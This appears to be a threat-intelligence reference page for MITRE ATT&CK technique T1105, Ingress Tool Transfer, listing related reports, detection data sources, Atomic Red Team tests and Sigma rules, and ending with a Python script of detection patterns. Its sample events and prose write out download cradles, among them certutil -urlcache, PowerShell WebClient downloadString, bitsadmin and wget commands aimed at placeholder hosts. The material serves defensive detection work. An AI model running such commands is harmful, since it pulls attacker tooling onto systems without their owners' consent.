T1105: Ingress Tool Transfer
| View on MITRE ATT&CK | T1105 |
|---|---|
| Tactic(s) | Command and Control |
Data from MITRE ATT&CK®:
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
Reporting on this Technique
Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day
Reporting from Mandiant which discusses the exploitation of Pulse Secure VPN devices in 2021 and 12 malware families associated with the campaign. ...
APT40 Advisory - PRC MSS tradecraft in action
This advisory, authored by the Australian Cyber Security Centre and multiple other international cybersecurity agencies, outlines the threat posed ...
Flax Typhoon using legitimate software to quietly access Taiwanese organizations
This blog post by Microsoft Threat Intelligence outlines the Flax Typhoon intrusion set and TTPs demonstrated by the group. It describes the actor ...
KAPEKA A novel backdoor spotted in Eastern Europe
This report from researchers at WithSecure unveils a novel backdoor: 'Kapeka'. Kapeka has been used against victims in Eastern Europe ...
Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation
This blog post by threat researchers at Mandiant outlines intrusions activity by the UNC3886 intrusion set which involved the deployment of ...
Connect:fun Detailing an exploitation campaign targeting FortiClient EMS via CVE-2023-48788
This report from Vedere Labs at Forescout Research details an exploitation campaign which they have designated Connect:fun. The attacks exploit ...
From OneNote to RansomNote: An Ice Cold Intrusion
This case report from The DFIR Report describes an intrusion which started with a malicious OneNote attachment. Opening the OneNote file led to ...
Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect
This blog post by researchers at Mandiant describes how the threat actor UNC5174 exploited vulnerabilities in F5 BIG-IP appliances and Connectwise ...
Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks
This article by researchers at Trend Micro discusses an Advanced Persistent Threat (APT) group they name Earth Krahang who have been observed ...
The Updated APT Playbook: Tales from the Kimsuky threat actor group
This article by researchers at Rapid7 discusses recent activity by North Korean intrusion set 'Kimsuky'. Kimsuky is primarily focused on ...
CVE-2024-21412: DarkGate Operators Exploit Microsoft Windows SmartScreen Bypass in Zero-Day Campaign
This report by TrendMicro's Zero Day Initiative describes a campaign associated with the DarkGate ransomware. According to the post, DarkGate ...
StopRansomware: Phobos Ransomware
This is a joint Cybersecurity Advisory produced by CISA, the FBI and the Multi-State Information Sharing and Analysis Center (MS-ISAC). It ...
PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure
Following an initial advisory issued in May 2023, this advisory from CISA, NSA and partners outlines information on the broader campaign of cyber ...
Buzzing on Christmas Eve: Trigona Ransomware in 3 Hours
This report by the DFIR Report outlines a Trigona Ransomware attack. It describes how the actors went from initial access (by exposed RDP) to data ...
Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
This blog post gives a detailed analysis of two critical vulnerabilities (CVE-2024-1708 and CVE-2024-1709) affecting ConnectWise ScreenConnect ...
Mitigations for this technique
MITRE ATT&CK Mitigations
How to detect this technique
MITRE ATT&CK Data Components
File Creation (File): Initial construction of a new file (ex: Sysmon EID 11)
Network Connection Creation (Network Traffic): Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)
Network Traffic Content (Network Traffic): Logged network traffic data showing both protocol header and body values (ex: PCAP)
Command Execution (Command): The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc.)
Network Traffic Flow (Network Traffic): Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)
Control Validation Tests for this Technique
Use Atomic Red Team tests to test your defenses against this technique.
Arbitrary file download using the Notepad++ GUP.exe binary
Nimgrab - Transfer Files
Linux Download File and Run
Download a File with Windows Defender MpCmdRun.exe
Download a file using wscript
certutil download (urlcache)
scp remote file copy (push)
Curl Upload File
scp remote file copy (pull)
sftp remote file copy (push)
certutil download (verifyctl)
Download a file with IMEWDBLD.exe
Windows - PowerShell Download
Curl Download File
Lolbas replace.exe use to copy file
MAZE Propagation Script
Windows - BITSAdmin BITS Download
Download a file with Microsoft Connection Manager Auto-Download
OSTAP Worming Activity
sftp remote file copy (pull)
iwr or Invoke Web-Request download
rsync remote file copy (push)
svchost writing a file to a UNC path
Printer Migration Command-Line Tool UNC share folder into a zip file
Lolbas replace.exe use to copy UNC file
File download with finger.exe on Windows
rsync remote file copy (pull)
whois file download
File Download via PowerShell
certreq download
Sigma Detections for this Technique
Password Protected ZIP File Opened (Suspicious Filenames)
Potential COM Objects Download Cradles Usage - Process Creation
File Download with Headless Browser
PowerShell DownloadFile
Command Line Execution with Suspicious URL and AppData Strings
Suspicious Invoke-WebRequest Execution With DirectIP
Potential Download/Upload Activity Using Type Command
Download File To Potentially Suspicious Directory Via Wget
Microsoft Binary Suspicious Communication Endpoint
PUA - Nimgrab Execution
Suspicious Invoke-WebRequest Execution
File Download via CertOC.EXE
Arbitrary File Download Via GfxDownloadWrapper.EXE
Suspicious Curl.EXE Download
Script Initiated Connection
Script Initiated Connection to Non-Local Network
File Download And Execution Via IEExec.EXE
Suspicious Dropbox API Usage
Remote File Download Via Findstr.EXE
Potential DLL File Download Via PowerShell Invoke-WebRequest
Pandemic Registry Key
File Download From Browser Process Via Inline URL
Remote File Download Via Desktopimgdownldr Utility
Import LDAP Data Interchange Format File Via Ldifde.EXE
Suspicious Desktopimgdownldr Target File
Remote File Copy
Suspicious Diantz Download and Compress Into a CAB File
Potential COM Objects Download Cradles Usage - PS Script
Download from Suspicious Dyndns Hosts
Executable from Webdav
Lolbas OneDriveStandaloneUpdater.exe Proxy Download
Suspicious Download from Office Domain
Network Connection Initiated By IMEWDBLD.EXE
Curl Download And Execute Combination
Suspicious Certreq Command to Download
Finger.exe Suspicious Invocation
Suspicious Curl File Upload - Linux
Curl Usage on Linux
File Download Via Windows Defender MpCmpRun.EXE
Wget Creating Files in Tmp Directory
Replace.exe Usage
Suspicious Extrac32 Execution
Suspicious Program Location with Network Connections
Insensitive Subfolder Search Via Findstr.EXE
File Download From IP Based URL Via CertOC.EXE
Connection Initiated Via Certutil.EXE
File Download Using Notepad++ GUP Utility
MsiExec Web Install
Cisco Stage Data
Potential In-Memory Download And Compile Of Payloads
Suspicious Desktopimgdownldr Command
AppX Package Installation Attempts Via AppInstaller.EXE
PrintBrm ZIP Creation of Extraction
PowerShell Web Download
Browser Execution In Headless Mode
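To show how command-line based detections of the kind listed above work against the Command Execution data component (Sysmon EID 1 / Windows 4688 style records), here is an added example; it is not the page's, MITRE's or Sigma's own rule logic, and the regexes, rule names and sample events are constructed for this illustration.

```python
import re

# Constructed detection logic for the download utilities named on this page
# (certutil, finger, PowerShell WebClient/Invoke-WebRequest, bitsadmin, curl, wget).
# Added example: not Sigma rule logic and not MITRE's analytics.
DIRECT_IP = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}[/:]", re.I)

RULES = {
    "certutil_urlcache":     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I),
    "certutil_verifyctl":    re.compile(r"\bcertutil(?:\.exe)?\b.*-verifyctl\b.*https?://", re.I),
    "ps_webclient_download": re.compile(r"net\.webclient\b.*\.download(?:string|file)\s*\(", re.I),
    "ps_invoke_webrequest":  re.compile(r"\b(?:invoke-webrequest|iwr)\b.*https?://", re.I),
    "bitsadmin_transfer":    re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b", re.I),
    "finger_download":       re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+", re.I),
    "curl_write_to_disk":    re.compile(r"\bcurl\b.*\s(?:-o|-O|--output)\b", re.I),
    "wget_to_tmp":           re.compile(r"\bwget\b.*\s-O\s*/(?:tmp|dev/shm)/", re.I),
}


def scan_command_line(cmdline: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    # A raw IP in the URL is a supporting indicator; report it only alongside a cradle hit.
    if hits and DIRECT_IP.search(cmdline):
        hits.append("direct_ip_url")
    return hits


def scan_events(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Run every rule over a batch of process-creation events; return (host, hits) for matches."""
    return [(e["host"], hits) for e in events if (hits := scan_command_line(e["CommandLine"]))]


# Constructed sample telemetry (hostnames, URLs and paths are invented, not real logs).
SAMPLE_EVENTS = [
    {"host": "ws01", "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/u.exe C:\\Users\\Public\\u.exe"},
    {"host": "ws01", "CommandLine": "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256"},
    {"host": "ws02", "CommandLine": "powershell -nop -c \"IEX(New-Object Net.WebClient).downloadString('https://example.invalid/s.ps1')\""},
    {"host": "ws03", "CommandLine": "bitsadmin.exe /transfer j /download /priority high http://example.invalid/a.dll C:\\Temp\\a.dll"},
    {"host": "lx01", "CommandLine": "wget -q http://example.invalid/x -O /tmp/x"},
    {"host": "lx01", "CommandLine": "curl -s https://example.invalid/api/status"},
]

if __name__ == "__main__":
    for host, hits in scan_events(SAMPLE_EVENTS):
        print(host, hits)
```

The benign certutil -hashfile and plain curl lines produce no hit, which is the point of anchoring each rule on the download-specific switch rather than on the binary name alone.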
SP800-53 Controls
See which controls can help protect against this MITRE ATT&CK technique. This is based on mappings to associated SP800-53 controls produced by the MITRE Engenuity Center for Threat-Informed Defense.